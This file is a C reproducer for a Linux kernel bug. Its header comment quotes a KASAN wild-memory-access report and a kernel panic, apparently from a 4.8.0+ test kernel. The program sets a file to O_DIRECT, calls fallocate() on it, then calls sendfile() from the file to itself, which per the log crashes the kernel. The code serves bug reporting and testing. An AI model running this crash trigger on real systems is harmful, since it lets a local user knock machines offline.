/* | |
[ 29.405419] ================================================================== | |
[ 29.406609] BUG: KASAN: wild-memory-access on address 0005080000000000 | |
[ 29.407649] Write of size 512 by task write512/1684 | |
[ 29.408539] CPU: 0 PID: 1684 Comm: write512 Not tainted 4.8.0+ #27 | |
[ 29.409574] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 | |
[ 29.411152] ffff88011bf6f370 ffffffff81bf7811 ffff88011bf6f408 0000000000000200 | |
[ 29.412457] 0000000000000000 ffff88007b50c000 ffff88011bf6f3f8 ffffffff815d952f | |
[ 29.413780] ffff88011bf6f420 1ffff100237ede78 ffff88011bf6f448 0000000000000297 | |
[ 29.414867] Call Trace: | |
[ 29.415337] [<ffffffff81bf7811>] dump_stack+0x83/0xb2 | |
[ 29.416228] [<ffffffff815d952f>] kasan_report_error+0x41f/0x500 | |
[ 29.417125] [<ffffffff81c37636>] ? iov_iter_get_pages+0x266/0xd70 | |
[ 29.418003] [<ffffffff815d9c28>] kasan_report+0x58/0x60 | |
[ 29.418752] [<ffffffff816f91bd>] ? do_blockdev_direct_IO+0x1e0d/0x8960 | |
[ 29.419654] [<ffffffff815d82dc>] check_memory_region+0x13c/0x1a0 | |
[ 29.420459] [<ffffffff815d8713>] memset+0x23/0x40 | |
[ 29.421089] [<ffffffff816f91bd>] do_blockdev_direct_IO+0x1e0d/0x8960 | |
[ 29.422035] [<ffffffff81348c0b>] ? from_kuid+0x1fb/0x280 | |
[ 29.422905] [<ffffffff817e28c7>] ? ext4_inode_csum_set+0xc7/0x4f0 | |
[ 29.423869] [<ffffffff816f73b0>] ? dio_send_cur_page+0x1ab0/0x1ab0 | |
[ 29.424906] [<ffffffff8111f4de>] ? update_stack_state.constprop.4+0xde/0x150 | |
[ 29.426086] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.427088] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.428069] [<ffffffff816ffdba>] __blockdev_direct_IO+0xaa/0xe0 | |
[ 29.429050] [<ffffffff817f85af>] ext4_direct_IO+0xc1f/0x12a0 | |
[ 29.429833] [<ffffffff81c9bc26>] ? depot_save_stack+0x1c6/0x5e0 | |
[ 29.430660] [<ffffffff814c2640>] generic_file_read_iter+0x8e0/0x1780 | |
[ 29.431640] [<ffffffff810b352b>] ? save_stack_trace+0x1b/0x20 | |
[ 29.432598] [<ffffffff815d8406>] ? save_stack+0x46/0xd0 | |
[ 29.433473] [<ffffffff815d867d>] ? kasan_kmalloc+0xad/0xe0 | |
[ 29.434386] [<ffffffff815d57a8>] ? __kmalloc+0x128/0x210 | |
[ 29.435238] [<ffffffff81651dfd>] ? alloc_pipe_info+0x27d/0x380 | |
[ 29.436241] [<ffffffff816d41d0>] ? splice_direct_to_actor+0x620/0x800 | |
[ 29.437355] [<ffffffff816d455d>] ? do_splice_direct+0x1ad/0x270 | |
[ 29.438229] [<ffffffff8163b7d1>] ? SyS_sendfile64+0xc1/0x140 | |
[ 29.439097] [<ffffffff82d0f9fb>] ? entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.439933] [<ffffffff814c1d60>] ? wait_on_page_bit_killable+0x250/0x250 | |
[ 29.440845] [<ffffffff816d31f9>] generic_file_splice_read+0x309/0x690 | |
[ 29.441619] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.442348] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.443029] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.443669] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.444500] [<ffffffff816d3b4f>] do_splice_to+0x10f/0x170 | |
[ 29.445191] [<ffffffff816d3e07>] splice_direct_to_actor+0x257/0x800 | |
[ 29.446106] [<ffffffff816d1f60>] ? generic_pipe_buf_nosteal+0x20/0x20 | |
[ 29.447099] [<ffffffff816d3bb0>] ? do_splice_to+0x170/0x170 | |
[ 29.447880] [<ffffffff81a09f5e>] ? security_file_permission+0x8e/0x1f0 | |
[ 29.448951] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.449822] [<ffffffff816d455d>] do_splice_direct+0x1ad/0x270 | |
[ 29.450649] [<ffffffff816d43b0>] ? splice_direct_to_actor+0x800/0x800 | |
[ 29.451637] [<ffffffff81acfc77>] ? apparmor_file_permission+0x27/0x30 | |
[ 29.452712] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.453530] [<ffffffff816399b0>] do_sendfile+0x530/0xcd0 | |
[ 29.454201] [<ffffffff81639480>] ? do_compat_pwritev64.isra.24+0x100/0x100 | |
[ 29.455086] [<ffffffff81acf9b5>] ? common_file_perm+0x2d5/0x370 | |
[ 29.455732] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.456571] [<ffffffff8163b7d1>] SyS_sendfile64+0xc1/0x140 | |
[ 29.457228] [<ffffffff8163b710>] ? SyS_sendfile+0x140/0x140 | |
[ 29.457871] [<ffffffff8162fcef>] ? SyS_fallocate+0x6f/0x90 | |
[ 29.458493] [<ffffffff82d0f9fb>] entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.459135] ================================================================== | |
[ 29.460001] Disabling lock debugging due to kernel taint | |
[ 29.460683] kasan: CONFIG_KASAN_INLINE enabled | |
[ 29.461086] kasan: GPF could be caused by NULL-ptr deref or user memory access | |
[ 29.461762] general protection fault: 0000 [#1] SMP KASAN | |
[ 29.462223] Modules linked in: | |
[ 29.462525] CPU: 0 PID: 1684 Comm: write512 Tainted: G B 4.8.0+ #27 | |
[ 29.463193] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 | |
[ 29.464433] task: ffff88011a9b8d80 task.stack: ffff88011bf68000 | |
[ 29.465044] RIP: 0010:[<ffffffff81c2a8b4>] [<ffffffff81c2a8b4>] __memset+0x24/0x30 | |
[ 29.465958] RSP: 0018:ffff88011bf6f460 EFLAGS: 00010206 | |
[ 29.466560] RAX: 0000000000000000 RBX: 0005080000000000 RCX: 0000000000000040 | |
[ 29.467472] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0005080000000000 | |
[ 29.468278] RBP: ffff88011bf6f480 R08: fffffbfff07b68d0 R09: 0005080000000000 | |
[ 29.469093] R10: ffff88011bf6f29f R11: fffffbfff07b68d0 R12: 0000000000000200 | |
[ 29.469947] R13: 0000000000000000 R14: ffff88007b50c000 R15: ffff8800799d6c00 | |
[ 29.470773] FS: 00007f4c154f4700(0000) GS:ffff88007dc00000(0000) knlGS:0000000000000000 | |
[ 29.471727] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 | |
[ 29.472401] CR2: 00007f4c152d72e0 CR3: 000000007a77b000 CR4: 00000000000006f0 | |
[ 29.473260] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 | |
[ 29.474091] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 | |
[ 29.474905] Stack: | |
[ 29.475157] ffffffff815d8721 0000000000000000 ffff88011a9b8d80 0000000000000200 | |
[ 29.476012] ffff88011bf6f7d0 ffffffff816f91bd 0000000000000000 ffff88007ad7bb80 | |
[ 29.476797] ffff88011a9b9510 ffff88011a9b8d80 ffff88011bf6f5c0 ffff88007ad7aa80 | |
[ 29.477614] Call Trace: | |
[ 29.477877] [<ffffffff815d8721>] ? memset+0x31/0x40 | |
[ 29.478392] [<ffffffff816f91bd>] do_blockdev_direct_IO+0x1e0d/0x8960 | |
[ 29.479041] [<ffffffff81348c0b>] ? from_kuid+0x1fb/0x280 | |
[ 29.479605] [<ffffffff817e28c7>] ? ext4_inode_csum_set+0xc7/0x4f0 | |
[ 29.480200] [<ffffffff816f73b0>] ? dio_send_cur_page+0x1ab0/0x1ab0 | |
[ 29.480816] [<ffffffff8111f4de>] ? update_stack_state.constprop.4+0xde/0x150 | |
[ 29.481556] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.482207] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.482858] [<ffffffff816ffdba>] __blockdev_direct_IO+0xaa/0xe0 | |
[ 29.483502] [<ffffffff817f85af>] ext4_direct_IO+0xc1f/0x12a0 | |
[ 29.484097] [<ffffffff81c9bc26>] ? depot_save_stack+0x1c6/0x5e0 | |
[ 29.484696] [<ffffffff814c2640>] generic_file_read_iter+0x8e0/0x1780 | |
[ 29.485364] [<ffffffff810b352b>] ? save_stack_trace+0x1b/0x20 | |
[ 29.485960] [<ffffffff815d8406>] ? save_stack+0x46/0xd0 | |
[ 29.486514] [<ffffffff815d867d>] ? kasan_kmalloc+0xad/0xe0 | |
[ 29.487112] [<ffffffff815d57a8>] ? __kmalloc+0x128/0x210 | |
[ 29.487703] [<ffffffff81651dfd>] ? alloc_pipe_info+0x27d/0x380 | |
[ 29.488345] [<ffffffff816d41d0>] ? splice_direct_to_actor+0x620/0x800 | |
[ 29.489027] [<ffffffff816d455d>] ? do_splice_direct+0x1ad/0x270 | |
[ 29.489652] [<ffffffff8163b7d1>] ? SyS_sendfile64+0xc1/0x140 | |
[ 29.490247] [<ffffffff82d0f9fb>] ? entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.490933] [<ffffffff814c1d60>] ? wait_on_page_bit_killable+0x250/0x250 | |
[ 29.491643] [<ffffffff816d31f9>] generic_file_splice_read+0x309/0x690 | |
[ 29.492372] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.492934] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.493648] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.494215] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.494790] [<ffffffff816d3b4f>] do_splice_to+0x10f/0x170 | |
[ 29.495369] [<ffffffff816d3e07>] splice_direct_to_actor+0x257/0x800 | |
[ 29.496015] [<ffffffff816d1f60>] ? generic_pipe_buf_nosteal+0x20/0x20 | |
[ 29.496764] [<ffffffff816d3bb0>] ? do_splice_to+0x170/0x170 | |
[ 29.497431] [<ffffffff81a09f5e>] ? security_file_permission+0x8e/0x1f0 | |
[ 29.498227] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.498824] [<ffffffff816d455d>] do_splice_direct+0x1ad/0x270 | |
[ 29.499554] [<ffffffff816d43b0>] ? splice_direct_to_actor+0x800/0x800 | |
[ 29.500423] [<ffffffff81acfc77>] ? apparmor_file_permission+0x27/0x30 | |
[ 29.501345] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.502173] [<ffffffff816399b0>] do_sendfile+0x530/0xcd0 | |
[ 29.502980] [<ffffffff81639480>] ? do_compat_pwritev64.isra.24+0x100/0x100 | |
[ 29.503998] [<ffffffff81acf9b5>] ? common_file_perm+0x2d5/0x370 | |
[ 29.504858] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.505754] [<ffffffff8163b7d1>] SyS_sendfile64+0xc1/0x140 | |
[ 29.506674] [<ffffffff8163b710>] ? SyS_sendfile+0x140/0x140 | |
[ 29.507622] [<ffffffff8162fcef>] ? SyS_fallocate+0x6f/0x90 | |
[ 29.508442] [<ffffffff82d0f9fb>] entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.509351] Code: 90 90 90 90 90 90 90 0f 1f 44 00 00 49 89 f9 48 89 d1 83 e2 07 48 c1 e9 03 40 0f b6 f6 48 b8 01 01 01 01 01 01 01 01 48 0f af c6 <f3> 48 ab 89 d1 f3 aa 4c 89 c8 c3 90 49 89 f9 40 88 f0 48 89 d1 | |
[ 29.513129] RIP [<ffffffff81c2a8b4>] __memset+0x24/0x30 | |
[ 29.513734] RSP <ffff88011bf6f460> | |
[ 29.514336] ---[ end trace 590e2d88ab8960f7 ]--- | |
[ 29.514845] Kernel panic - not syncing: Fatal exception | |
[ 29.515992] Kernel Offset: disabled | |
[ 29.516409] ---[ end Kernel panic - not syncing: Fatal exception | |
*/ | |
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/sendfile.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
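/*
 * Reproducer for the KASAN "wild-memory-access" report quoted above.
 *
 * Sequence: create/open a regular file, switch it to O_DIRECT|O_NOATIME via
 * F_SETFL, preallocate a range with fallocate(), then sendfile() from the
 * file to itself. In the log the faulting write is a memset() inside
 * do_blockdev_direct_IO() reached from generic_file_splice_read() under
 * SyS_sendfile64, i.e. the direct-I/O read path entered through splice.
 *
 * The log names a "4.8.0+" test kernel; whether any other kernel is affected
 * is not established by this file.
 *
 * Returns 0 once the syscall sequence has been issued (the original returned
 * 0 unconditionally), 1 if the file cannot be opened or prepared. The scratch
 * file "./hurrdurr" is created in the current directory and is not removed.
 */

/* The original passed raw numbers to fcntl(); these are the Linux flag values
 * behind 0x44000 (O_DIRECT = 0x4000, O_NOATIME = 0x40000 on x86-64). Fallbacks
 * are only used when <fcntl.h> was included without _GNU_SOURCE in effect. */
#ifndef O_DIRECT
#define O_DIRECT 040000
#endif
#ifndef O_NOATIME
#define O_NOATIME 01000000
#endif

int main(void)
{
    /* 0x40 in the original open() flags is O_CREAT. O_CREAT requires a mode
     * argument, which the original omitted (the vararg was read uninitialised). */
    int fd = open("./hurrdurr", O_APPEND | O_RDWR | O_CREAT, S_IRUSR | S_IWUSR);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* Original: fcntl(fd, 4, 0x44000) -- 4 is F_SETFL. Extra zero arguments
     * were ignored by fcntl() and are dropped. */
    if (fcntl(fd, F_SETFL, O_DIRECT | O_NOATIME) < 0) {
        perror("fcntl(F_SETFL)");
        close(fd);
        return 1;
    }

    /* Preallocate 0xafa6 bytes starting at byte offset 0x21 (mode 0). */
    if (fallocate(fd, 0, 0x21, 0xafa6) < 0) {
        perror("fallocate");
        close(fd);
        return 1;
    }

    /* sendfile() from the file to itself. A failure here is reported but is
     * not an error for the reproducer: per the log, on an affected kernel the
     * machine panics inside this call and control never returns here. */
    off_t offset = 0;
    ssize_t n = sendfile(fd, fd, &offset, 0x800);
    if (n < 0) {
        perror("sendfile");
    }

    close(fd);
    return 0;
}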